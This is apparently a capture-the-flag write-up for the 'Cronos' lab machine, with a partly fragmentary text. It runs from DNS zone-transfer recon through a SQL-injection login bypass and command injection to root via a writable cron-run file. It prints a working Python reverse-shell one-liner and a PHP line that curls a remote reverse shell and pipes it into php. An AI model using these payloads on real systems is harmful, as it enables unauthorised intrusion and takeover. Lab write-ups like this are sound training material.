i. Port Scan
Navigating to the host in the browser:
Default Apache page…
Running a gobuster:
In the port scan, we saw DNS open. Let’s see if we can find any information:
We got a domain,
cronos.htb to our hosts file and attempt to browse to it:
Running a gobuster scan:
Once again, another dead end…
Let’s attempt a zone transfer, and see what kind of information we get:
admin.cronos.htb looks very promising…
/etc/hosts, let’s navigate to it:
A login page, lets attempt to bypass using SQLi…
admin' or '1'='1
Looks like we can run traceroute and see the output in the browser.
Let’s see if it’s vulnerable to command injection:
We have command injection!
To get a shell, I’m going to use a reverse shell python one-liner:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Looking at our listener:
iii. Privilege Escalation
Based off the name of the machine, and after not having much luck enumerating, let’s focus on cron.
The last line seems interesting… seems like artisan is being executed by root.
Let’s look at the permissions of
We own the file, and are able to write to it.
<?php system('curl http://10.10.10.14/rev.php | php') ?> This will download the php reverse shell from my host, and pipe it into php to execute. php reverse shell: http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Waiting a couple of seconds, and looking at our listener:
This box was a great refresher/practice for DNS.
Thanks for reading.
Sources / Links: : https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/ : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet